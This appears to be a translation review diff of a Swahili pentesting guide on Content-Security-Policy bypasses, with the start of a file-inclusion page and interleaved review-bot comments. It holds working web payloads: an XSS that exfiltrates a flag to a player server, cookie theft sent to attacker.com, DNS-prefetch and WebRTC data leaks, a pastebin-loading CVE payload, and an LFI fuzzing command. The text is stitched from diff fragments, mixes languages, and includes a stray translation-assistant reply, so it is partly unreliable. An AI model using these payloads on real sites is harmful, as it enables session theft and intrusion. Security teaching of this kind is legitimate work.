`'unsafe-inline'` ina maana kwamba unaweza kutekeleza script yoyote ndani ya code (XSS inaweza kutekeleza code) na `img-src *` ina maana kwamba unaweza kutumia kwenye ukurasa wa wavuti picha yoyote kutoka kwa rasilimali yoyote.
Unaweza bypass CSP hii kwa exfiltrating data kupitia picha (katika tukio hili XSS inatumia CSRF ambapo ukurasa unaopatikana na bot una SQLi, na extract flag kupitia picha):
Unaweza bypass CSP hii kwa exfiltrating data kupitia picha (katika tukio hili XSS inatumia CSRF ambapo ukurasa unaopatikana na bot una SQLi, na kutoa flag kupitia picha):
```javascript
<script>
fetch('http://x-oracle-v0.nn9ed.ka0labs.org/admin/search/x%27%20union%20select%20flag%20from%20challenge%23').then(_=>_.text()).then(_=>new
Image().src='http://PLAYER_SERVER/?'+_)
</script>
```
Chanzo: [https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle](https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle)
From: [https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle](https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle)
Unaweza pia kutumia vibaya usanidi huu ili **kupakia javascript code iliyowekwa ndani ya picha**. Kwa mfano, ikiwa ukurasa unaruhusu kupakua picha kutoka Twitter. Unaweza **unda** **picha maalum**, **pakia** kwenye Twitter na kutumia "**unsafe-inline**" ku**tekeleza** JS code (kama XSS ya kawaida) ambayo itapakia **picha**, **itoa** **JS** kutoka ndani yake na **kuitekeleza** **hiyo**: [https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/](https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/)
Unaweza pia kutumia mbiu hii kuweza **load javascript code inserted inside an image**. Kwa mfano, ikiwa ukurasa unaruhusu kupakia picha kutoka Twitter. Unaweza **craft** **special image**, **upload** yake kwenye Twitter na kutumia "**unsafe-inline**" ili **execute** JS code (kama XSS ya kawaida) ambayo itaunda **load** ya **image**, **extract** **JS** kutoka ndani yake na kui**execute**: [https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/](https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/)
### Kwa Service Workers
Service workers **`importScripts`** function haizuiwi na CSP:
Service Workers `importScripts` function haijawekewa kikomo na CSP:
{{#ref}}
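Review bot: "ita **pelekwa upande wa server hadi ...**" in the server-side redirect paragraph puts a bold marker inside the verb "itapelekwa", so it renders as a broken word; move the marker to a word boundary ("**itapelekwa upande wa server hadi** `https://www.google.com/complete/search?...`"). The same line needs class agreement in "kikomo la path": "kikomo cha path". Further down, "Unaweza pia kutumia mbiu hii" replaces "usanidi huu" (this configuration) with "mbiu" (a proclamation), a meaning error; keep "usanidi huu", and "ambayo itaunda **load** ya **image**" should stay "ambayo itapakia **picha**" as the previous version had it. "Chanzo:" under the x-oracle snippet was also un-translated to "From:".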
@ -469,25 +469,25 @@ Service workers **`importScripts`** function haizuiwi na CSP:
#### Chrome
Ikiwa **parameter** uliyotuma inakwekwa ndani ya **declaration** ya **policy,** basi unaweza **badilisha** **policy** kwa namna yoyote itakayoi**fanya isiwe na maana**. Unaweza **kuruhusu script 'unsafe-inline'** kwa mojawapo ya njia hizi za bypass:
Ikiwa **parameter** uliotumwa na wewe ime **pasted inside** ya **declaration** ya **policy,** basi unaweza **alter** **policy** kwa namna itakayoiweka **it useless**. Unaweza **allow script 'unsafe-inline'** kwa mojawapo ya hizi bypasses:
```bash
script-src-elem *; script-src-attr *
script-src-elem 'unsafe-inline'; script-src-attr 'unsafe-inline'
```
Kwa sababu directive hii itafunika **script-src directives zilizopo**.\
You can find an example here: [http://portswigger-labs.net/edge_csp_injection_xndhfye721/?x=%3Bscript-src-elem+\*\&y=%3Cscript+src=%22http://subdomain1.portswigger-labs.net/xss/xss.js%22%3E%3C/script%3E](http://portswigger-labs.net/edge_csp_injection_xndhfye721/?x=%3Bscript-src-elem+*&y=%3Cscript+src=%22http://subdomain1.portswigger-labs.net/xss/xss.js%22%3E%3C/script%3E)
Kwa sababu directive hii itabadilisha script-src directives zilizopo.\
Unaweza kupata mfano hapa: [http://portswigger-labs.net/edge_csp_injection_xndhfye721/?x=%3Bscript-src-elem+\*\&y=%3Cscript+src=%22http://subdomain1.portswigger-labs.net/xss/xss.js%22%3E%3C/script%3E](http://portswigger-labs.net/edge_csp_injection_xndhfye721/?x=%3Bscript-src-elem+*&y=%3Cscript+src=%22http://subdomain1.portswigger-labs.net/xss/xss.js%22%3E%3C/script%3E)
#### Edge
Kwenye Edge ni rahisi zaidi. Kama unaweza kuongeza katika CSP tu hii: **`;_`**, Edge itaondoa kabisa **policy**.\
Katika Edge ni rahisi zaidi. Ikiwa unaweza kuongeza kwenye CSP tu hivi: **`;_`** **Edge** itaiondoa sera nzima.\
Example: [http://portswigger-labs.net/edge_csp_injection_xndhfye721/?x=;\_\&y=%3Cscript%3Ealert(1)%3C/script%3E](<http://portswigger-labs.net/edge_csp_injection_xndhfye721/?x=;_&y=%3Cscript%3Ealert(1)%3C/script%3E>)
### img-src \*; via XSS (iframe) - Time attack
Tambua kutokuwepo kwa directive `'unsafe-inline'`\
Mara hii unaweza kumfanya mwathirika **kupakia** ukurasa ulioko chini ya **udhibiti wako** kupitia **XSS** kwa kutumia `<iframe`. Mara hii utamfanya mwathirika afikie ukurasa kutoka ambako unataka kutoa taarifa (**CSRF**). Huwezi kupata yaliyomo ya ukurasa, lakini kama kwa namna fulani unaweza **kudhibiti muda ukurasa unavyohitaji kupakia** unaweza kutoa taarifa unazohitaji.
Notice the lack of the directive `'unsafe-inline'`\
This time you can make the victim **load** a page in **your control** via **XSS** with a `<iframe`. This time you are going to make the victim access the page from where you want to extract information (**CSRF**). You cannot access the content of the page, but if somehow you can **control the time the page needs to load** you can extract the information you need.
Mara hii **flag** itatolewa; kila wakati **char inapokisiwa kwa usahihi** kupitia SQLi, **response** inachukua **muda zaidi** kutokana na sleep function. Kisha, utaweza kutoa flag:
Mara hii **flag** itatolewa, kila wakati **char imegadiriwa kwa usahihi** kupitia SQLi **response** inachukua **muda mrefu** kutokana na sleep function. Kisha, utaweza kutoa flag:
```html
<!--code from https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle -->
<iframe name="f" id="g"></iframe> // The bot will load an URL with the payload
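Review bot: the Time attack paragraph replaces two Swahili lines with English ("Notice the lack of the directive `'unsafe-inline'`" and "This time you can make the victim **load** a page in **your control** ..."), so this hunk un-translates content it should be translating; restore "Tambua kutokuwepo kwa directive `'unsafe-inline'`" and "Mara hii unaweza kumfanya mwathirika **kupakia** ukurasa ulioko chini ya **udhibiti wako** ...". Two further problems: "char imegadiriwa kwa usahihi" is misspelt ("imekadiriwa", or "inapokisiwa" as before), and the Chrome paragraph's "ime **pasted inside** ya **declaration**" glues a bold English participle onto a Swahili auxiliary; keep the previous "inawekwa ndani ya **declaration**" (with "inakwekwa" corrected to "inawekwa"). "itabadilisha script-src directives zilizopo" is also weaker than the previous "itafunika" for "override".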
@ -549,22 +549,22 @@ run()
```
### Kupitia Bookmarklets
Shambulio hili linahitaji aina ya social engineering ambapo mshambulizi **anamhakikishia mtumiaji kuburuta na kuachia kiungo juu ya bookmarklet ya kivinjari**. Bookmarklet hii itakuwa na msimbo wa **javascript wenye madhara** ambao unapoburuta na kuachishwa au kubonyezwa unatekelezwa katika muktadha wa dirisha la wavuti la sasa, **kupita kando ya CSP na kuruhusu kuiba taarifa nyeti** kama cookies au tokens.
Shambulio hili lingehusisha baadhi ya social engineering ambapo mshambuliaji **convinces the user to drag and drop a link over the bookmarklet of the browser**. Bookmarklet hii ingekuwa na **malicious javascript** code ambayo, wakati ya drag\&dropped or clicked, ingeteuliwa katika muktadha wa dirisha la wavuti la sasa, **bypassing CSP and allowing to steal sensitive information** kama cookies au tokens.
Kwa maelezo zaidi [**angalia ripoti ya asili hapa**](https://socradar.io/csp-bypass-unveiled-the-hidden-threat-of-bookmarklets/).
For more information [**check the original report here**](https://socradar.io/csp-bypass-unveiled-the-hidden-threat-of-bookmarklets/).
### Kupita kando ya CSP kwa kuweka CSP kali
### CSP bypass by restricting CSP
Katika [**this CTF writeup**](https://github.com/google/google-ctf/tree/master/2023/web-biohazard/solution), CSP inapitia kando kwa kuingiza ndani ya iframe iliyoruhusiwa CSP kali zaidi ambayo ilinzuia kupakia faili maalum ya JS ambayo, kisha, kupitia **prototype pollution** au **dom clobbering** iliruhusu **kutumia script tofauti ili kupakia script yoyote**.
In [**this CTF writeup**](https://github.com/google/google-ctf/tree/master/2023/web-biohazard/solution), CSP imevunjwa kwa kuingiza ndani ya iframe iliyokubaliwa CSP kali zaidi ambayo ilizuia kupakia faili maalum ya JS ambayo, kisha, kupitia **prototype pollution** au **dom clobbering** iliwezesha **abuse a different script to load an arbitrary script**.
Unaweza **kuzuia CSP ya Iframe** kwa kutumia attribute **`csp`**:
Unaweza **restrict a CSP of an Iframe** with the **`csp`** attribute:
```html
<iframe
src="https://biohazard-web.2023.ctfcompetition.com/view/[bio_id]"
csp="script-src https://biohazard-web.2023.ctfcompetition.com/static/closure-library/ https://biohazard-web.2023.ctfcompetition.com/static/sanitizer.js https://biohazard-web.2023.ctfcompetition.com/static/main.js 'unsafe-inline' 'unsafe-eval'"></iframe>
```
Katika [**this CTF writeup**](https://github.com/aszx87410/ctf-writeups/issues/48), ilikuwa inawezekana kupitia **HTML injection** kuifanya **CSP** kuwa na vikwazo zaidi kiasi kwamba script iliyokuwa ikizuia **CSTI** ilizimwa na kwa hivyo **vulnerability became exploitable.**\
CSP inaweza kufanywa kuwa kali zaidi kwa kutumia **HTML meta tags** na **inline scripts** zinaweza kuzimwa kwa **kuondoa** **entry** inayoruhusu **nonce** yao na **enable specific inline script via sha**:
Katika [**this CTF writeup**](https://github.com/aszx87410/ctf-writeups/issues/48), ilikuwa inawezekana kupitia **HTML injection** **restrict** zaidi **CSP**, hivyo script iliyokuwa ikizuia CSTI ilizimwa na kwa hiyo **vulnerability became exploitable.**\
CSP inaweza kufanywa kuwa kali zaidi kwa kutumia **HTML meta tags** na inline scripts zinaweza kuzimwa kwa **removing** ile **entry** inayoruhusu **nonce** zao na **enable specific inline script via sha**:
```html
<meta
http-equiv="Content-Security-Policy"
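Review bot: two whole units are replaced by untranslated English here: the sentence "For more information [**check the original report here**]" and the heading "### CSP bypass by restricting CSP", both of which previously had Swahili versions ("Kwa maelezo zaidi ...", "### Kupita kando ya CSP kwa kuweka CSP kali"). Other new lines in this hunk switch language mid-sentence, e.g. "Unaweza **restrict a CSP of an Iframe** with the **`csp`** attribute:", which reads as half-translated; keep the prose in Swahili and only terms such as CSP, iframe, prototype pollution and DOM clobbering in English. Also, "CSP imevunjwa" ("the CSP is broken") loses the meaning "bypassed" that the previous wording ("inapitia kando") carried.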
@ -575,55 +575,55 @@ content="script-src 'self'
```
### JS exfiltration with Content-Security-Policy-Report-Only
Iwapo unaweza kusababisha server kuituma header **`Content-Security-Policy-Report-Only`** yenye **thamani unayodhibiti** (labda kwa sababu ya CRLF), unaweza kuielekeza kwa server yako na ikiwa **utaweka** **JS content** unayotaka ku-exfiltrate ndani ya **`<script>`**, na kwa kuwa kuna uwezekano mkubwa `unsafe-inline` hauruhusiwi na CSP, hii itasababisha **CSP error** na sehemu ya script (iliyomo taarifa nyeti) itatumwa kwa server kupitia `Content-Security-Policy-Report-Only`.
Ikiwa unaweza kufanikisha server kujibu na header **`Content-Security-Policy-Report-Only`** yenye **thamani inayodhibitiwa na wewe** (labda kwa sababu ya CRLF), unaweza kuifanya iielekeze kwa server yako, na ukifunga (wrap) **JS content** unayotaka ku-exfiltrate ndani ya **`<script>`**, na kwa kuwa kuna uwezekano mkubwa `unsafe-inline` haikubaliwi na CSP, hii itasababisha **CSP error** na sehemu ya script (inayoeleza taarifa nyeti) itatumwa kwa server kupitia `Content-Security-Policy-Report-Only`.
Kwa mfano [**angalia hii CTF writeup**](https://github.com/maple3142/My-CTF-Challenges/tree/master/TSJ%20CTF%202022/Nim%20Notes).
Kwa mfano [**check this CTF writeup**](https://github.com/maple3142/My-CTF-Challenges/tree/master/TSJ%20CTF%202022/Nim%20Notes).
### [CVE-2020-6519](https://www.perimeterx.com/tech-blog/2020/csp-bypass-vuln-disclosure/)
```javascript
document.querySelector("DIV").innerHTML =
'<iframe src=\'javascript:var s = document.createElement("script");s.src = "https://pastebin.com/raw/dw5cWGK6";document.body.appendChild(s);\'></iframe>'
```
### Leaking Taarifa na CSP na Iframe
### Leaking Information with CSP and Iframe
- Kuna `iframe` inayoundwa inayoelekeza kwa URL (tuitaje `https://example.redirect.com`) ambayo inaruhusiwa na CSP.
- URL hii inapindaisha hadi URL ya siri (kwa mfano `https://usersecret.example2.com`) ambayo **haikiruhusiwi** na CSP.
- Kwa kusikiliza tukio la `securitypolicyviolation`, mtu anaweza kunasa property ya `blockedURI`. Property hii inaonyesha domain ya blocked URI, leaking the secret domain to which the initial URL redirected.
- An `iframe` inaundwa inayobofya kwenye URL (tuseme `https://example.redirect.com`) ambayo imekuruhusiwa na CSP.
- URL hii kisha redirects kwenda kwenye URL ya siri (mfano, `https://usersecret.example2.com`) ambayo **haijaruhusiwa** na CSP.
- Kwa kusikiliza tukio la `securitypolicyviolation`, mtu anaweza kunasa property ya `blockedURI`. Property hii inaonyesha domain ya URI iliyozuiliwa, ikileak domain ya siri ambayo URL ya awali ilielekezwa.
Inavutia kutambua kwamba browsers kama Chrome na Firefox zina tabia tofauti katika kushughulikia iframes kwa kuzingatia CSP, jambo linaloweza kusababisha leakage ya taarifa nyeti kutokana na undefined behavior.
Inavutia kutambua kuwa browsers kama Chrome na Firefox zina tabia tofauti katika kushughulikia `iframe` kuhusiana na CSP, jambo ambalo linaweza kusababisha leak ya taarifa nyeti kutokana na undefined behavior.
Mbinu nyingine inahusisha exploiting the CSP yenyewe kubaini secret subdomain. Mbinu hii inategemea binary search algorithm na kurekebisha CSP ili kujumuisha specific domains ambazo zinalengwa kupigwa block kwa makusudi. Kwa mfano, ikiwa secret subdomain imejengwa kwa herufi zisizojulikana, unaweza kwa kurudia kujaribu subdomains tofauti kwa kubadilisha CSP directive ili ku-block au kuweka allow subdomains hizi. Hapa kuna snippet inayoonyesha jinsi CSP inaweza kuwekwa ili kuwezesha method hii:
Mbinu nyingine inajumuisha kutumia CSP yenyewe ili kugundua subdomain ya siri. Njia hii inategemea binary search algorithm na kurekebisha CSP ili kujumuisha domains maalum ambazo zinazuiliwa kwa makusudi. Kwa mfano, ikiwa subdomain ya siri ina tabaka za herufi zisizojulikana, unaweza kufanya majaribio kwa kurudia kwa subdomains tofauti kwa kubadilisha CSP directive ili kuzizuia au kuziruhusu subdomains hizi. Hapa kuna snippet inayoonyesha jinsi CSP inaweza kuwekwa kusaidia mbinu hii:
```markdown
img-src https://chall.secdriven.dev https://doc-1-3213.secdrivencontent.dev https://doc-2-3213.secdrivencontent.dev ... https://doc-17-3213.secdriven.dev
```
Kwa kufuatilia maombi yanayozuiliwa au kuruhusiwa na CSP, mtu anaweza kupunguza herufi zinazowezekana katika subdomain ya siri, hatimaye kubaini URL kamili.
Kwa kufuatilia maombi ambayo CSP inazuia au kuruhusu, mtu anaweza kupunguza herufi zinazowezekana katika subdomain ya siri, na hatimaye kugundua URL kamili.
Mbinu zote mbili zinatumia utofauti mdogo wa utekelezaji wa CSP na tabia katika vivinjari, zikionyesha jinsi sera zinazojionyesha kuwa salama zinaweza kusababisha leak ya taarifa nyeti bila kukusudia.
Njia zote mbili zinatumia undani wa utekelezaji wa CSP na tabia katika browsers, zikionesha jinsi sera zinavyoonekana salama zinaweza bila kukusudia leak taarifa nyeti.
Trick from [**here**](https://ctftime.org/writeup/29310).
Mbinu kutoka [**here**](https://ctftime.org/writeup/29310).
## Teknolojia Hatari za Kuepuka CSP
## Teknolojia hatarishi za ku-bypass CSP
### Makosa ya PHP wakati kuna params nyingi sana
### PHP Errors when too many params
Kulingana na the [**last technique commented in this video**](https://www.youtube.com/watch?v=Sm4G6cAHjWM), kutuma vigezo vingi mno (1001 GET parameters ingawa pia unaweza kufanya hivyo kwa POST params na faili zaidi ya 20). Kila **`header()`** iliyobainishwa katika PHP web code **haitatumwa** kutokana na kosa ambalo hili litasababisha.
Kulingana na [**last technique commented in this video**](https://www.youtube.com/watch?v=Sm4G6cAHjWM), kutuma vigezo vingi (1001 GET parameters ingawa pia unaweza kufanya hivyo kwa POST params na faili zaidi ya 20). Kila **`header()`** iliyofafanuliwa kwenye code ya PHP ya web **haitatumwa** kutokana na kosa ambalo hilo litasababisha.
### PHP response buffer overload
PHP inajulikana kwa buffering the response to 4096 bytes kwa default. Kwa hiyo, ikiwa PHP inaonyesha warning, kwa kutoa data ya kutosha ndani ya warnings, the response itatumwa kabla ya CSP header, causing the header to be ignored.\
Then, the technique consists basically in filling the response buffer with warnings so the CSP header isn't sent.
PHP inajulikana kwa **ku-buffering the response to 4096** bytes kwa default. Kwa hivyo, ikiwa PHP inaonyesha warning, kwa kutoa **enough data inside warnings**, the **response** itatumwa **before** the **CSP header**, causing the header to be ignored.\
Kisha, mbinu inahusisha kwa msingi **kujaza the response buffer with warnings** ili CSP header isitumwe.
Idea from [**this writeup**](https://hackmd.io/@terjanq/justCTF2020-writeups#Baby-CSP-web-6-solves-406-points).
Wazo kutoka [**this writeup**](https://hackmd.io/@terjanq/justCTF2020-writeups#Baby-CSP-web-6-solves-406-points).
### Kill CSP via max_input_vars (headers already sent)
Kwa kuwa headers lazima zitumwe kabla ya output yoyote, warnings emitted by PHP zinaweza kuharibu au kufanya zisifanye kazi mwito za `header()` zinazofuata. Ikiwa user input itazidi `max_input_vars`, PHP itatoa startup warning kwanza; any subsequent `header('Content-Security-Policy: ...')` itashindwa na “headers already sent”, ikifanya CSP izimike kwa ufanisi na kuruhusu reflective XSS ambayo vinginevyo ingezuiliwa.
Kwa sababu headers lazima zitumwe kabla ya output yoyote, warnings zinazotolewa na PHP zinaweza kuharibu wito za baadaye za `header()`. Ikiwa input ya mtumiaji itazidi `max_input_vars`, PHP itatoa startup warning kwanza; `header('Content-Security-Policy: ...')` yoyote baada yake itashindwa na “headers already sent”, kwa ufanisi kuzima CSP na kuruhusu XSS reflektifu ambayo vinginevyo ingekuwa imesitishwa.
```php
<?php
header("Content-Security-Policy: default-src 'none';");
echo $_GET['xss'];
```
Sina maudhui ya faili. Tafadhali weka hapa yaliyomo ya src/pentesting-web/content-security-policy-csp-bypass/README.md ili niweze kuyatafsiri.
Mfano:
```bash
# CSP in place → payload blocked by browser
curl -i "http://orange.local/?xss=<svg/onload=alert(1)>"
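Review bot: the line "Sina maudhui ya faili. Tafadhali weka hapa yaliyomo ya src/pentesting-web/content-security-policy-csp-bypass/README.md ili niweze kuyatafsiri." is a leaked reply from the translation assistant ("I don't have the file contents, please paste them here so I can translate"), not page content; the version that ships must read "Mfano:" ("Example:") as the paired line does. In the iframe leak bullets, "An `iframe` inaundwa inayobofya kwenye URL ... ambayo imekuruhusiwa na CSP" has the typo "imekuruhusiwa" (should be "imeruhusiwa") and "inayobofya" ("that clicks") mistranslates "points to"; the previous wording "inayoelekeza kwa URL ... ambayo inaruhusiwa na CSP" was correct and can be kept.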
@ -633,9 +633,9 @@ curl -i "http://orange.local/?xss=<svg/onload=alert(1)>&A=1&A=2&...&A=1000"
# Warning: PHP Request Startup: Input variables exceeded 1000 ...
# Warning: Cannot modify header information - headers already sent
```
### Andika Upya Ukurasa la Kosa
### Kuandika Upya Ukurasa wa Makosa
Kutokana na [**this writeup**](https://blog.ssrf.kr/69) inaonekana kuwa ilikuwa inawezekana ku-bypass ulinzi wa CSP kwa kupakia ukurasa la kosa (huenda bila CSP) na kuandika upya yaliyomo yake.
Kutoka kwa [**this writeup**](https://blog.ssrf.kr/69) inaonekana kuwa ilikuwa inawezekana kuvuka ulinzi wa CSP kwa kupakia ukurasa wa makosa (inawezekana bila CSP) na kuandika upya yaliyomo yake.
```javascript
a = window.open("/" + "x".repeat(4100))
setTimeout(function () {
@ -644,40 +644,40 @@ a.document.body.innerHTML = `<img src=x onerror="fetch('https://filesharing.m0le
```
### SOME + 'self' + wordpress
SOME ni mbinu inayofanya matumizi mabaya ya XSS (au XSS iliyopunguzwa sana) **in an endpoint of a page** ili **kuabusu** **endpoints nyingine za same origin.** Hii hufanywa kwa kupakia endpoint yenye udhaifu kutoka ukurasa wa mshambuliaji kisha kusasisha (refresh) ukurasa wa mshambuliaji hadi endpoint halisi ndani ya origin sawa unayotaka kuabusu. Kwa njia hii **endpoint yenye udhaifu** inaweza kutumia object ya **`opener`** katika **payload** ili **kupata DOM** ya **endpoint halisi ili kuabusu.** Kwa taarifa zaidi angalia:
SOME ni mbinu inayotumia XSS (au XSS iliyopunguzwa sana) **in an endpoint of a page** ili **abuse** **other endpoints of the same origin.** Hii inafanywa kwa kupakia vulnerable endpoint kutoka kwenye attacker page kisha ku-refresh attacker page hadi real endpoint katika same origin unayotaka kuabuse. Kwa njia hii **vulnerable endpoint** inaweza kutumia object ya **`opener`** katika **payload** ili **access the DOM** ya **real endpoint to abuse**. Kwa maelezo zaidi angalia:
{{#ref}}
../xss-cross-site-scripting/some-same-origin-method-execution.md
{{#endref}}
Zaidi ya hayo, **wordpress** ina endpoint ya **JSONP** katika `/wp-json/wp/v2/users/1?_jsonp=data` ambayo ita**reflect** the **data** iliyotumwa katika output (kwa kikomo cha herufi, nambari na nukta tu).
Zaidi ya hayo, **wordpress** ina **JSONP** endpoint katika `/wp-json/wp/v2/users/1?_jsonp=data` ambayo ita **reflect** the **data** iliyotumwa kwenye output (kwa kikomo cha herufi, namba na nukta pekee).
Mshambuliaji anaweza kutumia endpoint hiyo kuunda SOME attack dhidi ya WordPress na kuiingiza ndani ya `<script s`rc=`/wp-json/wp/v2/users/1?_jsonp=some_attack></script>` kumbuka kwamba **script** hii ita**loaded** kwa sababu ime **allowed by 'self'**. Zaidi ya hayo, na kwa sababu WordPress imewekwa, mshambuliaji anaweza kutumia **SOME attack** kupitia **vulnerable** **callback** endpoint ambayo **bypasses the CSP** ili kumpa mtumiaji vibali zaidi, kusanisha plugin mpya...\
Kwa taarifa zaidi kuhusu jinsi ya kufanya shambulio hili angalia [https://octagon.net/blog/2022/05/29/bypass-csp-using-wordpress-by-abusing-same-origin-method-execution/](https://octagon.net/blog/2022/05/29/bypass-csp-using-wordpress-by-abusing-same-origin-method-execution/)
Mshambuliaji anaweza kuabuse endpoint hiyo ili **generate a SOME attack** dhidi ya WordPress na **embed** ndani ya `<script s`rc=`/wp-json/wp/v2/users/1?_jsonp=some_attack></script>` kumbuka kwamba hii **script** ita **loaded** kwa sababu ime **allowed by 'self'**. Zaidi ya hayo, na kwa kuwa WordPress imewekwa, mshambuliaji anaweza kuabuse **SOME attack** kupitia **vulnerable** **callback** endpoint ambayo **bypasses the CSP** ili kumpa mtumiaji haki zaidi, kusanisha plugin mpya...\
Kwa maelezo zaidi kuhusu jinsi ya kufanya shambulio hili angalia [https://octagon.net/blog/2022/05/29/bypass-csp-using-wordpress-by-abusing-same-origin-method-execution/](https://octagon.net/blog/2022/05/29/bypass-csp-using-wordpress-by-abusing-same-origin-method-execution/)
## CSP Exfiltration Bypasses
Kama kuna CSP kali ambayo haitakuacha kuwasiliana na server za nje, kuna mambo kadhaa unaweza kufanya kila wakati ili kuondoa taarifa.
Kama kuna CSP kali ambayo haikuruhusu **interact with external servers**, bado kuna baadhi ya njia ambazo unaweza kutumia ku-exfiltrate taarifa.
### Location
Unaweza kubadilisha tu location ili kutuma kwa server ya mshambuliaji taarifa za siri:
Unaweza tu kusasisha location ili kutuma kwa server ya mshambuliaji taarifa zilizofichwa:
```javascript
var sessionid = document.cookie.split("=")[1] + "."
document.location = "https://attacker.com/?" + sessionid
```
### Meta tag
Unaweza kufanya redirect kwa kuingiza meta tag (hii ni redirect tu; hii haitasababisha leak ya maudhui)
Unaweza kufanya redirect kwa kuingiza meta tag (hii ni redirect tu, hii haitaleak maudhui)
```html
<meta http-equiv="refresh" content="1; http://attacker.com" />
```
### DNS Prefetch
Ili kupakia kurasa kwa haraka, vivinjari hutatua awali majina ya mwenyeji (hostnames) kuwa anwani za IP na kuyahifadhi kwenye cache kwa matumizi baadaye.\\
Unaweza kumuonyesha kivinjari kutatua awali jina la mwenyeji kwa: `<link rel="dns-prefetch" href="something.com">`
Ili kupakia kurasa kwa haraka, vivinjari zitapata mapema kutatua majina ya mwenyeji kuwa anwani za IP na kuzihifadhi kwenye kache kwa matumizi baadaye.\
Unaweza kumwelekeza kivinjari kutatua jina la mwenyeji mapema kwa kutumia: `<link rel="dns-prefetch" href="something.com">`
Unaweza kutumia vibaya tabia hii ili **exfiltrate sensitive information via DNS requests**:
Unaweza kutumia tabia hii vibaya ili **exfiltrate sensitive information via DNS requests**:
```javascript
var sessionid = document.cookie.split("=")[1] + "."
var body = document.getElementsByTagName("body")[0]
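Review bot: the inline code in the WordPress SOME paragraph is broken in both versions: `<script s`rc=`/wp-json/wp/v2/users/1?_jsonp=some_attack></script>` closes the code span after "s" and reopens it after "rc=", so the tag renders as two fragments with "rc=" as prose. Put one code span around the whole tag. The new paragraph also switches language heavily ("Mshambuliaji anaweza kuabuse endpoint hiyo ili **generate a SOME attack** dhidi ya WordPress na **embed** ndani ya ..."); keep the verbs in Swahili and only the terms (SOME, JSONP, callback, CSP) in English, as the previous version did.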
@ -694,18 +694,18 @@ linkEl.rel = "prefetch"
linkEl.href = urlWithYourPreciousData
document.head.appendChild(linkEl)
```
Ili kuzuia hili kutokee, seva inaweza kutuma HTTP header:
Ili kuzuia hili lisitokee, seva inaweza kutuma HTTP header:
```
X-DNS-Prefetch-Control: off
```
> [!TIP]
> Inaonekana mbinu hii haifanyi kazi kwenye headless browsers (bots)
> Inaonekana, mbinu hii haitumiki katika headless browsers (bots)
### WebRTC
Kwenye kurasa kadhaa unaweza kusoma kwamba **WebRTC haiangalii sera ya `connect-src` ya CSP**.
Kwenye kurasa kadhaa unaweza kusoma kwamba **WebRTC haitakagui sera ya `connect-src` ya CSP**.
Kwa kweli unaweza _leak_ taarifa kwa kutumia _DNS request_. Angalia code hii:
Kwa kweli unaweza _leak_ taarifa kwa kutumia _ombi la DNS_. Angalia msimbo huu:
```javascript
;(async () => {
p = new RTCPeerConnection({ iceServers: [{ urls: "stun:LEAK.dnsbin" }] })
@ -713,7 +713,7 @@ p.createDataChannel("")
p.setLocalDescription(await p.createOffer())
})()
```
Chaguo jingine:
Chaguo lingine:
```javascript
var pc = new RTCPeerConnection({
"iceServers":[
@ -727,7 +727,7 @@ pc.createOffer().then((sdp)=>pc.setLocalDescription(sdp);
```
### CredentialsContainer
Credential popup hutuma ombi la DNS kwenda iconURL bila kuzuiliwa na ukurasa. Inafanya kazi tu katika muktadha salama (HTTPS) au kwenye localhost.
Popup ya credentials ituma ombi la DNS kwa iconURL bila kuzuiwa na ukurasa. Inafanya kazi tu katika muktadha salama (HTTPS) au kwenye localhost.
```javascript
navigator.credentials.store(
new FederatedCredential({
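Review bot: "Popup ya credentials ituma ombi la DNS kwa iconURL" uses "ituma", which is not a valid present-tense form; the previous "hutuma" (or "inatuma") is correct and should be restored.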
@ -743,7 +743,7 @@ iconURL:"https:"+your_data+"example.com"
- [https://csp-evaluator.withgoogle.com/](https://csp-evaluator.withgoogle.com)
- [https://cspvalidator.org/](https://cspvalidator.org/#url=https://cspvalidator.org/)
## Kuunda CSP Kiotomatiki
## Kuunda CSP kwa Kiotomatiki
[https://csper.io/docs/generating-content-security-policy](https://csper.io/docs/generating-content-security-policy)
@ -4,14 +4,14 @@
## File Inclusion
**Remote File Inclusion (RFI):** Faili inapakiwa kutoka kwenye server ya mbali (Bora: Unaweza kuandika msimbo na server itauitekeleza). In php hii ime **zimwa** kwa default (**allow_url_include**).\
**Remote File Inclusion (RFI):** Faili inasomwa kutoka kwa server ya mbali (Bora: Unaweza kuandika msimbo na server itauitekeleza). Katika php hii ni **imezimwa** kwa default (**allow_url_include**).\
**Local File Inclusion (LFI):** Server inapakia faili ya ndani.
Udhaifu hutokea wakati mtumiaji anaweza kudhibiti kwa namna fulani faili itakayopakiwa na server.
Udhaifu hutokea wakati mtumiaji anaweza kwa njia fulani kudhibiti faili itakayopakiwa na server.
Funksioni za **PHP** zilizo hatarini: require, require_once, include, include_once
Zilizo hatarini **PHP functions**: require, require_once, include, include_once
Zana ya kuvutia ya kutumia ku-exploit udhaifu huu: [https://github.com/kurobeats/fimap](https://github.com/kurobeats/fimap)
Chombo kizuri cha ku-exploit udhaifu huu: [https://github.com/kurobeats/fimap](https://github.com/kurobeats/fimap)
## Blind - Interesting - LFI2RCE files
```python
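Review bot: "Katika php hii ni **imezimwa** kwa default (**allow_url_include**)" doubles the copula ("ni" followed by the "ime-" form); drop "ni" and write "Katika PHP hii **imezimwa** kwa default". "Faili inasomwa kutoka kwa server ya mbali" ("the file is read") is weaker than the source's "loaded", which the previous "inapakiwa" rendered more closely; the previous line did split the bold oddly ("ime **zimwa**"), and the new line rightly fixes that part.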
@ -19,17 +19,17 @@ wfuzz -c -w ./lfi2.txt --hw 0 http://10.10.10.10/nav.php?page=../../../../../../
```
### **Linux**
**Kwa kuchanganya orodha kadhaa za \*nix LFI na kuongeza njia zaidi, nimeunda hii:**
**Nimechanganya orodha kadhaa za \*nix LFI na kuongeza njia zaidi, nimeunda hii:**
{{#ref}}
https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_linux.txt
{{#endref}}
Jaribu pia kubadilisha `/` kwa `\`\
Jaribu pia kuongeza `../../../../../`
Pia jaribu kubadilisha `/` kwa `\`\
Pia jaribu kuongeza `../../../../../`
